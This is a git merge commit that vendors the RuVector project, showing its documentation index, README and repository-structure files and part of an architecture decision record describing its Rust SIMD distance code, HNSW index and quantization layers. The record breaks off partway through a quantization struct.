Merge commit 'd803bfe2b1fe7f5e219e50ac20d6801a0a58ac75' as 'vendor/ruvector'

This commit is contained in:
ruv
2026-02-28 14:39:40 -05:00
7854 changed files with 3522914 additions and 0 deletions

14
vendor/ruvector/docs/.gitkeep vendored Normal file
View File

@@ -0,0 +1,14 @@
# Documentation Structure
This directory contains all RuVector documentation organized by category:
- **getting-started/** - Quick start guides and tutorials
- **api/** - API documentation
- **architecture/** - System architecture docs
- **cloud-architecture/** - Global cloud deployment docs
- **guide/** - User guides
- **benchmarks/** - Benchmarking documentation
- **optimization/** - Performance optimization guides
- **development/** - Development and contribution guides
- **project-phases/** - Historical project phase documentation
- **testing/** - Testing documentation and reports

260
vendor/ruvector/docs/INDEX.md vendored Normal file
View File

@@ -0,0 +1,260 @@
# Ruvector Documentation Index
Complete index of all Ruvector documentation.
## Quick Links
- [Getting Started](guides/GETTING_STARTED.md) - Start here!
- [Installation](guides/INSTALLATION.md) - Platform-specific installation
- [API Reference](api/) - Complete API documentation
- [Examples](../examples/) - Working code examples
- [Contributing](development/CONTRIBUTING.md) - How to contribute
## Documentation Structure
```
docs/
├── adr/ # Architecture Decision Records
├── analysis/ # Research & analysis docs
├── api/ # API references (Rust, Node.js, Cypher)
├── architecture/ # System design docs
├── benchmarks/ # Performance benchmarks & results
├── cloud-architecture/ # Cloud deployment guides
├── code-reviews/ # Code review documentation
├── dag/ # DAG implementation
├── development/ # Developer guides
├── examples/ # SQL examples
├── gnn/ # GNN/Graph implementation
├── guides/ # User guides & tutorials
├── hnsw/ # HNSW index documentation
├── hooks/ # Hooks system documentation
├── implementation/ # Implementation details & summaries
├── integration/ # Integration guides
├── nervous-system/ # Nervous system architecture
├── optimization/ # Performance optimization guides
├── plans/ # Implementation plans
├── postgres/ # PostgreSQL extension docs
│ └── zero-copy/ # Zero-copy memory docs
├── project-phases/ # Development phases
├── publishing/ # NPM publishing guides
├── research/ # Research documentation
│ ├── cognitive-frontier/ # Cognitive frontier research
│ ├── gnn-v2/ # GNN v2 research plans
│ ├── latent-space/ # HNSW & attention research
│ └── mincut/ # MinCut algorithm research
├── ruvllm/ # RuVLLM documentation
├── security/ # Security audits & reports
├── sparse-inference/ # Sparse inference docs
├── sql/ # SQL examples
├── testing/ # Testing documentation
└── training/ # Training & LoRA docs
```
## User Guides
### Getting Started
- **[Getting Started Guide](guides/GETTING_STARTED.md)** - Quick introduction to Ruvector
- **[Installation Guide](guides/INSTALLATION.md)** - Installation for Rust, Node.js, WASM, CLI
- **[Basic Tutorial](guides/BASIC_TUTORIAL.md)** - Step-by-step tutorial with examples
- **[Advanced Features Guide](guides/ADVANCED_FEATURES.md)** - Hybrid search, quantization, MMR, filtering
### Quick Starts
- **[AgenticDB Quickstart](guides/AGENTICDB_QUICKSTART.md)** - Quick start for AgenticDB
- **[AgenticDB API](guides/AGENTICDB_API.md)** - Detailed AgenticDB API documentation
- **[Optimization Quick Start](guides/OPTIMIZATION_QUICK_START.md)** - Performance optimization guide
- **[Quick Fix Guide](guides/quick-fix-guide.md)** - Common issues and solutions
### WASM Guides
- **[WASM API](guides/wasm-api.md)** - Browser WASM API
- **[WASM Build Guide](guides/wasm-build-guide.md)** - Building for WASM
### Migration
- **[Migration from AgenticDB](development/MIGRATION.md)** - Complete migration guide with examples
## HNSW Documentation
- **[HNSW Index](hnsw/HNSW_INDEX.md)** - HNSW index overview
- **[HNSW Quick Reference](hnsw/HNSW_QUICK_REFERENCE.md)** - Quick reference guide
- **[HNSW Usage Example](hnsw/HNSW_USAGE_EXAMPLE.md)** - Working examples
- **[HNSW Implementation Summary](hnsw/HNSW_IMPLEMENTATION_SUMMARY.md)** - Implementation details
- **[HNSW Implementation README](hnsw/HNSW_IMPLEMENTATION_README.md)** - Detailed README
## PostgreSQL Extension
### Core Documentation
- **[Operator Quick Reference](postgres/operator-quick-reference.md)** - Operator reference
- **[Parallel Query Guide](postgres/parallel-query-guide.md)** - Parallel query execution
- **[Parallel Implementation](postgres/parallel-implementation-summary.md)** - Implementation details
### SparseVec
- **[SparseVec Quickstart](postgres/SPARSEVEC_QUICKSTART.md)** - Sparse vector quick start
- **[SparseVec Implementation](postgres/SPARSEVEC_IMPLEMENTATION.md)** - Implementation details
### Zero-Copy Memory
- **[Zero-Copy Implementation](postgres/zero-copy/ZERO_COPY_IMPLEMENTATION.md)** - Zero-copy overview
- **[Zero-Copy Operators](postgres/zero-copy/zero-copy-operators.md)** - Operator details
- **[Zero-Copy Summary](postgres/zero-copy/ZERO_COPY_OPERATORS_SUMMARY.md)** - Summary
- **[Zero-Copy Examples](postgres/zero-copy/examples.rs)** - Rust examples
- **[Memory Quick Reference](postgres/postgres-zero-copy-quick-reference.md)** - Quick reference
- **[Memory Implementation](postgres/postgres-memory-implementation-summary.md)** - Memory details
- **[Memory Guide](postgres/postgres-zero-copy-memory.md)** - Comprehensive guide
## Architecture Documentation
- **[System Overview](architecture/SYSTEM_OVERVIEW.md)** - High-level architecture and design
- **[NPM Package Architecture](architecture/NPM_PACKAGE_ARCHITECTURE.md)** - Package structure
- **[Technical Plan](architecture/TECHNICAL_PLAN.md)** - Technical roadmap
- **[Repository Structure](REPO_STRUCTURE.md)** - Codebase organization
### Cloud Architecture
- **[Architecture Overview](cloud-architecture/architecture-overview.md)** - Cloud design
- **[Deployment Guide](cloud-architecture/DEPLOYMENT_GUIDE.md)** - Deployment instructions
- **[Infrastructure Design](cloud-architecture/infrastructure-design.md)** - Infrastructure details
- **[Scaling Strategy](cloud-architecture/scaling-strategy.md)** - Scaling approaches
- **[Performance Optimization](cloud-architecture/PERFORMANCE_OPTIMIZATION_GUIDE.md)** - Cloud performance
## API Reference
### Platform APIs
- **[Rust API](api/RUST_API.md)** - Complete Rust API reference
- **[Node.js API](api/NODEJS_API.md)** - Complete Node.js API reference
- **[Cypher Reference](api/CYPHER_REFERENCE.md)** - Cypher query language
## GNN & Graph Documentation
- **[Graph Integration Summary](gnn/GRAPH_INTEGRATION_SUMMARY.md)** - Overview of graph features
- **[Graph Validation Checklist](gnn/GRAPH_VALIDATION_CHECKLIST.md)** - Validation guide
- **[GNN Layer Implementation](gnn/gnn-layer-implementation.md)** - Layer details
- **[Graph Attention Implementation](gnn/graph-attention-implementation-summary.md)** - Attention mechanisms
- **[Hyperbolic Attention](gnn/hyperbolic-attention-implementation.md)** - Hyperbolic embeddings
- **[Cypher Parser](gnn/cypher-parser-implementation.md)** - Query parser
- **[CLI Graph Commands](gnn/cli-graph-commands.md)** - CLI usage
- **[Graph WASM Setup](gnn/graph-wasm-setup.md)** - WASM bindings
- **[Node Bindings](gnn/ruvector-gnn-node-bindings.md)** - Node.js bindings
- **[Training Utilities](gnn/training-utilities-implementation.md)** - Training tools
## Integration Guides
- **[Integration Summary](integration/INTEGRATION-SUMMARY.md)** - Integration overview
- **[Psycho-Symbolic Integration](integration/PSYCHO-SYMBOLIC-INTEGRATION.md)** - Symbolic AI integration
- **[Psycho-Synth Quick Start](integration/PSYCHO-SYNTH-QUICK-START.md)** - Quick start guide
## Performance & Benchmarks
- **[Benchmarking Guide](benchmarks/BENCHMARKING_GUIDE.md)** - How to run and interpret benchmarks
- **[Benchmark Comparison](benchmarks/BENCHMARK_COMPARISON.md)** - Performance comparisons
### Optimization Guides
- **[Performance Tuning Guide](optimization/PERFORMANCE_TUNING_GUIDE.md)** - Detailed optimization guide
- **[Build Optimization](optimization/BUILD_OPTIMIZATION.md)** - Compilation optimizations
- **[Optimization Results](optimization/OPTIMIZATION_RESULTS.md)** - Benchmark results
- **[Implementation Summary](optimization/IMPLEMENTATION_SUMMARY.md)** - Optimization implementation
## Implementation Documentation
### Implementation Details
- **[Implementation Summary](implementation/IMPLEMENTATION_SUMMARY.md)** - Overall implementation
- **[Improvement Roadmap](implementation/IMPROVEMENT_ROADMAP.md)** - Future plans
- **[Security Fixes Summary](implementation/SECURITY_FIXES_SUMMARY.md)** - Security improvements
- **[Overflow Fixes](implementation/overflow_fixes_verification.md)** - Bug fixes
### Phase Summaries
- **[Phase 2: HNSW](project-phases/phase2_hnsw_implementation.md)** - HNSW integration
- **[Phase 3: AgenticDB](project-phases/PHASE3_SUMMARY.md)** - AgenticDB layer
- **[Phase 4: Advanced Features](project-phases/phase4-implementation-summary.md)** - Product quantization, hybrid search
- **[Phase 5: Multi-Platform](project-phases/phase5-implementation-summary.md)** - Node.js, WASM, CLI
- **[Phase 6: Advanced](project-phases/PHASE6_SUMMARY.md)** - Future features
## Publishing & Deployment
- **[Publishing Guide](publishing/PUBLISHING-GUIDE.md)** - How to publish packages
- **[NPM Publishing](publishing/NPM_PUBLISHING.md)** - NPM-specific guide
- **[NPM Token Setup](publishing/NPM_TOKEN_SETUP.md)** - Authentication setup
- **[Package Validation](publishing/PACKAGE-VALIDATION-REPORT.md)** - Validation report
- **[Publishing Status](publishing/PUBLISHING.md)** - Current status
## Development
- **[Contributing Guide](development/CONTRIBUTING.md)** - How to contribute
- **[Security](development/SECURITY.md)** - Security guidelines
- **[Migration Guide](development/MIGRATION.md)** - Migration documentation
- **[NPM Package Review](development/NPM_PACKAGE_REVIEW.md)** - Package review
- **[Fixing Compilation Errors](development/FIXING_COMPILATION_ERRORS.md)** - Troubleshooting
## Testing
- **[Test Suite Summary](testing/TDD_TEST_SUITE_SUMMARY.md)** - Testing strategy
- **[Integration Testing Report](testing/integration-testing-report.md)** - Integration tests
## Research & Advanced Features
### Cognitive Frontier
- **[Temporal Hypergraphs](research/cognitive-frontier/temporal-hypergraphs.md)** - Time-varying hyperedges with causal constraints
- **[Federated Strange Loops](research/cognitive-frontier/federated-strange-loops.md)** - Multi-system mutual observation
### Latent Space
- **[Implementation Roadmap](research/latent-space/implementation-roadmap.md)** - Development plan
- **[GNN Architecture Analysis](research/latent-space/gnn-architecture-analysis.md)** - Architecture deep-dive
- **[Attention Mechanisms Research](research/latent-space/attention-mechanisms-research.md)** - Research notes
- **[Advanced Architectures](research/latent-space/advanced-architectures.md)** - Advanced designs
- **[Optimization Strategies](research/latent-space/optimization-strategies.md)** - Optimization approaches
- **[HNSW Evolution](research/latent-space/hnsw-evolution-overview.md)** - HNSW research
- **[HNSW Neural Augmentation](research/latent-space/hnsw-neural-augmentation.md)** - Neural features
- **[HNSW Quantum Hybrid](research/latent-space/hnsw-quantum-hybrid.md)** - Quantum computing
### MinCut Research
- **[LocalKCut Algorithm](research/mincut/localkcut-algorithm.md)** - Algorithm overview
- **[LocalKCut Implementation](research/mincut/localkcut-implementation-summary.md)** - Implementation details
- **[Paper Implementation](research/mincut/localkcut-paper-implementation.md)** - December 2025 paper
### GNN v2 Research
- **[Master Plan](research/gnn-v2/00-master-plan.md)** - GNN v2 overview
- **[GNN Guided Routing](research/gnn-v2/01-gnn-guided-routing.md)** - Routing research
- **[Incremental Graph Learning](research/gnn-v2/02-incremental-graph-learning.md)** - Learning approaches
- **[Neuro-Symbolic Query](research/gnn-v2/03-neuro-symbolic-query.md)** - Query processing
- **[Hyperbolic Embeddings](research/gnn-v2/04-hyperbolic-embeddings.md)** - Embedding research
- **[Adaptive Precision](research/gnn-v2/05-adaptive-precision.md)** - Precision optimization
- **[Temporal GNN](research/gnn-v2/06-temporal-gnn.md)** - Temporal features
- **[Graph Condensation](research/gnn-v2/07-graph-condensation.md)** - Condensation techniques
- **[Native Sparse Attention](research/gnn-v2/08-native-sparse-attention.md)** - Sparse attention
- **[Quantum-Inspired Attention](research/gnn-v2/09-quantum-inspired-attention.md)** - Quantum approaches
- **[Innovative Features](research/innovative-gnn-features-2024-2025.md)** - 2024-2025 research
### DSPy Integration
- **[DSPy Research](research/dspy-ts-comprehensive-research.md)** - Comprehensive research
- **[DSPy Quick Start](research/dspy-ts-quick-start-guide.md)** - Quick start guide
- **[Claude Flow Integration](research/claude-flow-dspy-integration.md)** - Integration guide
## Project Information
- **[README](README.md)** - Documentation overview
- **[Project README](../README.md)** - Project overview
- **[CHANGELOG](../CHANGELOG.md)** - Version history
- **[LICENSE](../LICENSE)** - MIT License
## Documentation Statistics
- **Total directories**: 20+
- **Total documentation files**: 170+ markdown files
- **User guides**: 12+ comprehensive guides
- **API references**: 3 platform APIs
- **Code examples**: 10+ working examples
- **Languages covered**: Rust, JavaScript/TypeScript, WASM, SQL
## Getting Help
### Resources
- **Documentation**: This index and linked guides
- **Examples**: [../examples/](../examples/) directory
- **API docs**: `cargo doc --no-deps --open`
- **Benchmarks**: `cargo bench`
### Support Channels
- **GitHub Issues**: [Report bugs or request features](https://github.com/ruvnet/ruvector/issues)
- **GitHub Discussions**: [Ask questions](https://github.com/ruvnet/ruvector/discussions)
- **Pull Requests**: [Contribute code](https://github.com/ruvnet/ruvector/pulls)
---
**Last Updated**: 2025-12-25
**Version**: 0.1.29

143
vendor/ruvector/docs/README.md vendored Normal file
View File

@@ -0,0 +1,143 @@
# RuVector Documentation
Complete documentation for RuVector, the high-performance Rust vector database with global scale capabilities.
## 📚 Documentation Structure
```
docs/
├── adr/ # Architecture Decision Records
├── analysis/ # Research & analysis docs
├── api/ # API references (Rust, Node.js, Cypher)
├── architecture/ # System design docs
├── benchmarks/ # Performance benchmarks & results
├── cloud-architecture/ # Cloud deployment guides
├── code-reviews/ # Code review documentation
├── dag/ # DAG implementation
├── development/ # Developer guides
├── examples/ # SQL examples
├── gnn/ # GNN/Graph implementation
├── guides/ # User guides & tutorials
├── hnsw/ # HNSW index documentation
├── hooks/ # Hooks system documentation
├── implementation/ # Implementation details & summaries
├── integration/ # Integration guides
├── nervous-system/ # Nervous system architecture
├── optimization/ # Performance optimization guides
├── plans/ # Implementation plans
├── postgres/ # PostgreSQL extension docs
├── project-phases/ # Development phases
├── publishing/ # NPM publishing guides
├── research/ # Research documentation
├── ruvllm/ # RuVLLM documentation
├── security/ # Security audits & reports
├── sparse-inference/ # Sparse inference docs
├── sql/ # SQL examples
├── testing/ # Testing documentation
└── training/ # Training & LoRA docs
```
### Getting Started
- **[guides/GETTING_STARTED.md](./guides/GETTING_STARTED.md)** - Getting started guide
- **[guides/BASIC_TUTORIAL.md](./guides/BASIC_TUTORIAL.md)** - Basic tutorial
- **[guides/INSTALLATION.md](./guides/INSTALLATION.md)** - Installation instructions
- **[guides/AGENTICDB_QUICKSTART.md](./guides/AGENTICDB_QUICKSTART.md)** - AgenticDB quick start
- **[guides/wasm-api.md](./guides/wasm-api.md)** - WebAssembly API documentation
### Architecture & Design
- **[architecture/](./architecture/)** - System architecture details
- **[cloud-architecture/](./cloud-architecture/)** - Global cloud deployment
- **[adr/](./adr/)** - Architecture Decision Records
- **[nervous-system/](./nervous-system/)** - Nervous system architecture
### API Reference
- **[api/RUST_API.md](./api/RUST_API.md)** - Rust API reference
- **[api/NODEJS_API.md](./api/NODEJS_API.md)** - Node.js API reference
- **[api/CYPHER_REFERENCE.md](./api/CYPHER_REFERENCE.md)** - Cypher query reference
### Performance & Benchmarks
- **[benchmarks/](./benchmarks/)** - Performance benchmarks & results
- **[optimization/](./optimization/)** - Performance optimization guides
- **[analysis/](./analysis/)** - Research & analysis docs
### Security
- **[security/](./security/)** - Security audits & reports
### Implementation
- **[implementation/](./implementation/)** - Implementation details & summaries
- **[integration/](./integration/)** - Integration guides
- **[code-reviews/](./code-reviews/)** - Code review documentation
### Specialized Topics
- **[gnn/](./gnn/)** - GNN/Graph implementation
- **[hnsw/](./hnsw/)** - HNSW index documentation
- **[postgres/](./postgres/)** - PostgreSQL extension docs
- **[ruvllm/](./ruvllm/)** - RuVLLM documentation
- **[training/](./training/)** - Training & LoRA docs
### Development
- **[development/CONTRIBUTING.md](./development/CONTRIBUTING.md)** - Contribution guidelines
- **[development/MIGRATION.md](./development/MIGRATION.md)** - Migration guide
- **[testing/](./testing/)** - Testing documentation
- **[publishing/](./publishing/)** - NPM publishing guides
### Research
- **[research/](./research/)** - Research documentation
- cognitive-frontier/ - Cognitive frontier research
- gnn-v2/ - GNN v2 research
- latent-space/ - HNSW & attention research
- mincut/ - MinCut algorithm research
---
## 🚀 Quick Links
### For New Users
1. Start with [Getting Started Guide](./guides/GETTING_STARTED.md)
2. Try the [Basic Tutorial](./guides/BASIC_TUTORIAL.md)
3. Review [API Documentation](./api/)
### For Cloud Deployment
1. Read [Architecture Overview](./cloud-architecture/architecture-overview.md)
2. Follow [Deployment Guide](./cloud-architecture/DEPLOYMENT_GUIDE.md)
3. Apply [Performance Optimizations](./cloud-architecture/PERFORMANCE_OPTIMIZATION_GUIDE.md)
### For Contributors
1. Read [Contributing Guidelines](./development/CONTRIBUTING.md)
2. Review [Architecture Decisions](./adr/)
3. Check [Migration Guide](./development/MIGRATION.md)
### For Performance Tuning
1. Review [Optimization Guide](./optimization/PERFORMANCE_TUNING_GUIDE.md)
2. Run [Benchmarks](./benchmarks/BENCHMARKING_GUIDE.md)
3. Check [Analysis](./analysis/)
---
## 📊 Documentation Status
| Category | Directory | Status |
|----------|-----------|--------|
| Getting Started | guides/ | ✅ Complete |
| Architecture | architecture/, adr/ | ✅ Complete |
| API Reference | api/ | ✅ Complete |
| Performance | benchmarks/, optimization/, analysis/ | ✅ Complete |
| Security | security/ | ✅ Complete |
| Implementation | implementation/, integration/ | ✅ Complete |
| Development | development/, testing/ | ✅ Complete |
| Research | research/ | 📚 Ongoing |
**Total Documentation**: 170+ comprehensive documents across 25+ directories
---
## 🔗 External Resources
- **GitHub Repository**: https://github.com/ruvnet/ruvector
- **Main README**: [../README.md](../README.md)
- **Changelog**: [../CHANGELOG.md](../CHANGELOG.md)
- **License**: [../LICENSE](../LICENSE)
---
**Last Updated**: 2026-02-26 | **Version**: 2.0.4 (core) / 0.1.100 (npm) | **Status**: Production Ready

192
vendor/ruvector/docs/REPO_STRUCTURE.md vendored Normal file
View File

@@ -0,0 +1,192 @@
# Repository Structure
Clean and organized structure for the RuVector project.
## Root Directory
```
ruvector/
├── README.md # Main project README
├── CHANGELOG.md # Version history and changes
├── CLAUDE.md # Claude Code configuration
├── LICENSE # MIT License
├── Cargo.toml # Rust workspace configuration
├── Cargo.lock # Rust dependency lock
├── package.json # NPM workspace configuration
├── .gitignore # Git ignore rules
├── crates/ # Rust crates
│ ├── ruvector-core/ # Core vector database
│ ├── ruvector-node/ # Node.js bindings
│ ├── ruvector-wasm/ # WebAssembly bindings
│ ├── ruvector-cli/ # Command-line interface
│ ├── ruvector-bench/ # Benchmarking suite
│ ├── ruvllm/ # LLM inference engine
│ ├── sona/ # Self-Optimizing Neural Architecture
│ ├── router-core/ # Neural routing
│ └── ... # Additional crates
├── npm/ # NPM packages
│ └── packages/
│ ├── ruvector/ # Core bindings
│ ├── ruvllm/ # LLM package
│ ├── raft/ # Consensus implementation
│ ├── replication/ # Data replication
│ └── scipix/ # OCR client
├── docs/ # 📚 Documentation (organized)
│ ├── README.md # Documentation index
│ ├── INDEX.md # Complete file index
│ ├── REPO_STRUCTURE.md # This file
│ ├── adr/ # Architecture Decision Records
│ ├── analysis/ # Research & analysis
│ ├── api/ # API documentation
│ ├── architecture/ # System architecture
│ ├── benchmarks/ # Performance benchmarks
│ ├── cloud-architecture/ # Cloud deployment
│ ├── code-reviews/ # Code reviews
│ ├── development/ # Contributing guides
│ ├── gnn/ # GNN documentation
│ ├── guides/ # User guides
│ ├── hnsw/ # HNSW documentation
│ ├── hooks/ # Hooks system
│ ├── implementation/ # Implementation details
│ ├── integration/ # Integration guides
│ ├── nervous-system/ # Nervous system arch
│ ├── optimization/ # Performance tuning
│ ├── postgres/ # PostgreSQL extension
│ ├── project-phases/ # Historical phases
│ ├── publishing/ # NPM publishing
│ ├── research/ # Research documentation
│ ├── ruvllm/ # RuVLLM docs
│ ├── security/ # Security audits
│ ├── testing/ # Testing docs
│ └── training/ # Training & LoRA
├── src/ # 🚀 Cloud deployment source
│ ├── cloud-run/ # Cloud Run services
│ ├── agentic-integration/ # Agent coordination
│ └── burst-scaling/ # Auto-scaling system
├── benchmarks/ # Load testing and benchmarks
├── tests/ # Rust integration tests
├── examples/ # Example code
│ ├── rust/ # Rust examples
│ ├── nodejs/ # Node.js examples
│ └── wasm-*/ # WASM examples
└── .claude/ # Claude Code helpers
```
## Documentation Organization
All documentation is organized in `/docs` with clear categories:
### 📖 Guides & Tutorials
- **guides/** - Getting started, tutorials, installation
- **api/** - Rust, Node.js, Cypher API references
### 🏗️ Architecture & Design
- **adr/** - Architecture Decision Records
- **architecture/** - System design documents
- **cloud-architecture/** - Global cloud deployment
- **nervous-system/** - Nervous system architecture
### ⚡ Performance
- **benchmarks/** - Performance benchmarks & results
- **optimization/** - Performance tuning guides
- **analysis/** - Research & analysis documents
### 🔐 Security
- **security/** - Security audits & reports
### 💻 Implementation
- **implementation/** - Implementation details & summaries
- **integration/** - Integration guides
- **code-reviews/** - Code review documentation
### 🔬 Specialized Topics
- **gnn/** - Graph Neural Networks
- **hnsw/** - HNSW index documentation
- **postgres/** - PostgreSQL extension
- **ruvllm/** - RuVLLM documentation
- **training/** - Training & LoRA guides
### 👨‍💻 Development
- **development/** - Contributing, migration, troubleshooting
- **testing/** - Testing documentation
- **publishing/** - NPM publishing guides
- **hooks/** - Hooks system documentation
### 🔬 Research
- **research/** - Research documentation
- cognitive-frontier/ - Advanced AI research
- gnn-v2/ - GNN v2 plans
- latent-space/ - HNSW & attention research
- mincut/ - MinCut algorithm research
### 📜 Historical
- **project-phases/** - Project phase documentation
## Source Code Organization
### `/crates` - Rust Crates
Core Rust implementation organized as workspace:
- `ruvector-core` - Core vector database
- `ruvllm` - LLM inference engine
- `sona` - Self-Optimizing Neural Architecture
- Platform bindings (Node.js, WASM, FFI)
- CLI and benchmarking tools
### `/npm/packages` - NPM Packages
TypeScript packages for Node.js:
- `@ruvector/ruvector` - Core bindings
- `@ruvector/ruvllm` - LLM inference
- `@ruvector/raft` - Consensus implementation
- `@ruvector/replication` - Data replication
- `@ruvector/scipix` - OCR client
### `/src` - Cloud Deployment Code
Global streaming implementation:
- `cloud-run/` - Cloud Run services
- `agentic-integration/` - Distributed agent coordination
- `burst-scaling/` - Auto-scaling and capacity management
### `/benchmarks` - Load Testing
Comprehensive benchmarking suite for performance testing
## File Counts
- **Documentation**: 170+ markdown files (organized in 25+ directories)
- **Rust Crates**: 15+ crates
- **NPM Packages**: 5 packages
- **Root Files**: 8 essential files only
## Clean Root Directory
Only essential files in root:
- ✅ README.md - Project overview
- ✅ CHANGELOG.md - Version history
- ✅ CLAUDE.md - Development configuration
- ✅ LICENSE - MIT license
- ✅ Cargo.toml - Rust workspace
- ✅ Cargo.lock - Dependencies
- ✅ package.json - NPM workspace
- ✅ .gitignore - Git rules
**No test files, temporary files, or duplicate docs in root!**
## Navigation Tips
1. **New users**: Start at [docs/README.md](./README.md)
2. **Quick start**: See [docs/guides/](./guides/)
3. **Cloud deployment**: Check [docs/cloud-architecture/](./cloud-architecture/)
4. **Contributing**: Read [docs/development/CONTRIBUTING.md](./development/CONTRIBUTING.md)
5. **API docs**: Browse [docs/api/](./api/)
6. **Architecture decisions**: Review [docs/adr/](./adr/)
---
**Last Updated**: 2026-01-21
**Status**: ✅ Clean and Organized
**Total Documentation**: 170+ files properly categorized

View File

@@ -0,0 +1,787 @@
# ADR-001: Ruvector Core Architecture
**Status**: Proposed
**Date**: 2026-01-18
**Authors**: ruv.io, RuVector Team
**Deciders**: Architecture Review Board
**SDK**: Claude-Flow
**Note**: The storage layer described in this ADR is superseded by ADR-029 (RVF as Canonical Binary Format). All vector persistence now uses the RVF segment model.
## Version History
| Version | Date | Author | Changes |
|---------|------|--------|---------|
| 0.1 | 2026-01-18 | ruv.io | Initial architecture proposal |
---
## Context
### The Vector Database Challenge
Modern AI applications require vector databases that can:
1. **Store high-dimensional embeddings** from LLMs and embedding models
2. **Search with sub-millisecond latency** for real-time inference
3. **Scale to billions of vectors** while maintaining performance
4. **Deploy anywhere** - edge devices, browsers (WASM), cloud servers
5. **Integrate seamlessly** with LLM inference pipelines
### Current State of Vector Databases
Existing solutions fall into several categories:
| Category | Examples | Limitations |
|----------|----------|-------------|
| **Cloud-only** | Pinecone | No edge deployment, vendor lock-in |
| **Heavy native** | Milvus, Qdrant | Complex deployment, high memory |
| **Python-first** | ChromaDB, FAISS | Performance overhead, no WASM |
| **Learning-capable** | None | No existing solutions learn from usage |
### The Ruvector Vision
Ruvector is designed as a **high-performance, learning-capable vector database** implemented in Rust that:
- Achieves **61us p50 latency** for k=10 search on 384-dim vectors
- Provides **2-32x memory compression** through tiered quantization
- Runs **anywhere** - native (x86_64, ARM64), WASM (browser, edge), PostgreSQL extension
- **Learns from usage** via GNN layers that improve search quality over time
- Integrates with **AI agent memory systems** for policy, session state, and audit logs
---
## Decision
### Adopt a Layered, SIMD-Optimized Architecture
We implement ruvector-core as the foundational vector database engine with the following architecture:
```
+-----------------------------------------------------------------------------+
| APPLICATION LAYER |
| AgenticDB | VectorDB API | Cypher Queries | REST/gRPC Server |
+-----------------------------------------------------------------------------+
|
+-----------------------------------------------------------------------------+
| INDEX LAYER |
| HNSW Index | Flat Index | Filtered Search | Hybrid Search | MMR |
+-----------------------------------------------------------------------------+
|
+-----------------------------------------------------------------------------+
| QUANTIZATION LAYER |
| Scalar (4x) | Product (8-16x) | Binary (32x) | Conformal Prediction |
+-----------------------------------------------------------------------------+
|
+-----------------------------------------------------------------------------+
| DISTANCE LAYER |
| Euclidean | Cosine | Dot Product | Manhattan | SIMD Dispatch |
+-----------------------------------------------------------------------------+
|
+-----------------------------------------------------------------------------+
| SIMD INTRINSICS LAYER |
| AVX2/AVX-512 (x86_64) | NEON (ARM64/Apple Silicon) | Scalar Fallback |
+-----------------------------------------------------------------------------+
|
+-----------------------------------------------------------------------------+
| STORAGE LAYER |
| REDB (native) | Memory-only (WASM) | PostgreSQL Extension |
+-----------------------------------------------------------------------------+
```
---
## Key Components
### 1. SIMD Intrinsics Layer (`simd_intrinsics.rs`)
The performance foundation of ruvector, providing hardware-accelerated distance calculations.
#### Architecture Dispatch
```rust
pub fn euclidean_distance_simd(a: &[f32], b: &[f32]) -> f32 {
#[cfg(target_arch = "x86_64")]
{
if is_x86_feature_detected!("avx2") {
unsafe { euclidean_distance_avx2_impl(a, b) }
} else {
euclidean_distance_scalar(a, b)
}
}
#[cfg(target_arch = "aarch64")]
{
unsafe { euclidean_distance_neon_impl(a, b) }
}
#[cfg(not(any(target_arch = "x86_64", target_arch = "aarch64")))]
{
euclidean_distance_scalar(a, b)
}
}
```
#### Supported Operations
| Operation | AVX2 (x86_64) | NEON (ARM64) | Scalar Fallback |
|-----------|---------------|--------------|-----------------|
| Euclidean Distance | 8 floats/cycle | 4 floats/cycle | 1 float/cycle |
| Dot Product | 8 floats/cycle | 4 floats/cycle | 1 float/cycle |
| Cosine Similarity | 8 floats/cycle | 4 floats/cycle | 1 float/cycle |
| Manhattan Distance | N/A | 4 floats/cycle | 1 float/cycle |
#### Performance Characteristics
| Metric | AVX2 | NEON | Scalar |
|--------|------|------|--------|
| **512-dim Euclidean** | ~16M ops/sec | ~8M ops/sec | ~2M ops/sec |
| **384-dim Cosine** | ~143ns | ~200ns | ~800ns |
| **1536-dim Dot Product** | ~33ns | ~50ns | ~150ns |
#### Security Guarantees
- Bounds checking via `assert_eq!(a.len(), b.len())` prevents buffer overflows
- Unaligned loads (`_mm256_loadu_ps`, `vld1q_f32`) handle arbitrary alignment
- Scalar fallback handles remainder elements after SIMD processing
### 2. Distance Metrics Layer (`distance.rs`)
High-level distance API with optional SimSIMD integration for additional acceleration.
#### Supported Metrics
```rust
pub enum DistanceMetric {
Euclidean, // L2 distance: sqrt(sum((a[i] - b[i])^2))
Cosine, // 1 - cosine_similarity
DotProduct, // Negative dot product (for maximization)
Manhattan, // L1 distance: sum(|a[i] - b[i]|)
}
```
#### Feature Flags
| Feature | Description | Use Case |
|---------|-------------|----------|
| `simd` | SimSIMD acceleration | Native builds |
| `parallel` | Rayon batch processing | Multi-core systems |
| None | Pure Rust fallback | WASM builds |
#### Batch Distance API
```rust
pub fn batch_distances(
query: &[f32],
vectors: &[Vec<f32>],
metric: DistanceMetric,
) -> Result<Vec<f32>> {
#[cfg(all(feature = "parallel", not(target_arch = "wasm32")))]
{
use rayon::prelude::*;
vectors.par_iter()
.map(|v| distance(query, v, metric))
.collect()
}
// Sequential fallback for WASM...
}
```
### 3. Index Structures (`index/`)
#### HNSW Index (`index/hnsw.rs`)
Hierarchical Navigable Small World graph for approximate nearest neighbor search.
**Configuration Parameters:**
| Parameter | Default | Description |
|-----------|---------|-------------|
| `m` | 32 | Connections per layer (higher = better recall, more memory) |
| `ef_construction` | 200 | Build-time search depth (higher = better graph, slower build) |
| `ef_search` | 100 | Query-time search depth (higher = better recall, slower query) |
| `max_elements` | 10M | Pre-allocated capacity |
**Complexity Analysis:**
| Operation | Time Complexity | Space Complexity |
|-----------|-----------------|------------------|
| Insert | O(log n * m * ef_construction) | O(m * log n) per vector |
| Search | O(log n * m * ef_search) | O(ef_search) |
| Delete | O(1)* | O(1) |
*Note: HNSW deletion marks vectors as removed but does not restructure the graph.
**Serialization:**
```rust
pub struct HnswState {
vectors: Vec<(String, Vec<f32>)>,
id_to_idx: Vec<(String, usize)>,
idx_to_id: Vec<(usize, String)>,
next_idx: usize,
config: SerializableHnswConfig,
dimensions: usize,
metric: SerializableDistanceMetric,
}
```
#### Flat Index
Linear scan index for small datasets or exact search.
**Use Cases:**
- Datasets < 10K vectors
- Exact k-NN required
- Benchmarking HNSW recall
### 4. Quantization Strategies (`quantization.rs`)
Memory compression techniques trading precision for storage efficiency.
#### Scalar Quantization (4x compression)
Quantizes f32 to u8 using min-max scaling.
```rust
pub struct ScalarQuantized {
pub data: Vec<u8>, // Quantized values
pub min: f32, // Minimum for dequantization
